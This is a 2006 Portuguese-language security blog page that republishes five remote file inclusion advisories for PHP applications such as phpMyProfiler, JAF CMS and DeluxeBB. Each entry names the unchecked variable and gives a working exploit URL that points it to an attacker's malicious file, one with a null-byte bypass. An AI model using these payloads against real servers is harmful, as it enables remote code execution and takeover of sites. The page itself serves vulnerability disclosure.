terça-feira, outubro 03, 2006

phpMyProfiler 0.96 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $pmp_rel_path do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyProfiler 0.96 e inferiores
Download: sourceforge.net
Código vulnerável (functions.php):
indisponível
Desoberta por: mozi
Exploit:
http://host/functions.php?pmp_rel_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com
Postado por às Um comentário:

JAF CMS 4.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $website= do arquivo forum.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: JAF CMS 4.0
Download: sourceforge.net
Código vulnerável (forum.php):
indisponível
Desoberta por: Kacper (a.k.a Rahim)
Exploit:
http://host/module/forum/forum.php?fd=hack&website=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com
Postado por às Nenhum comentário:

segunda-feira, outubro 02, 2006

Deluxe BB - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $templatefolder do arquivo Sig.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: DeluxeBB
Download: deluxebb.com
Código vulnerável (functions.php):
indisponível
Desoberta por: r0ut3r
Exploit:
http://host/templates/deluxe/cp/sig.php?settings[smilies]=on&templat
efolder=arquivomaligno?%00
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com
Postado por às Nenhum comentário:

PHP Web Scripts Easy Banner - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $s[phppath]= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: PHP Web Scripts Easy Banner
Download: phpwebscripts.com
Código vulnerável (functions.php):
indisponível
Desoberta por: abu ahmed
Exploit:
http://host/functions.php?s[phppath]=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com
Postado por às Nenhum comentário:

BBaCE 3.5 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $phpbb_root_path= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: BBaCE 3.5 e anteriores
Download: bbace.blogspot.com
Código vulnerável (functions.php):
indisponível
Desoberta por: SpiderZ
Exploit:
http://host/includes/functions.php?phpbb_root_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com
Postado por às Nenhum comentário:
Assinar: Comentários (Atom)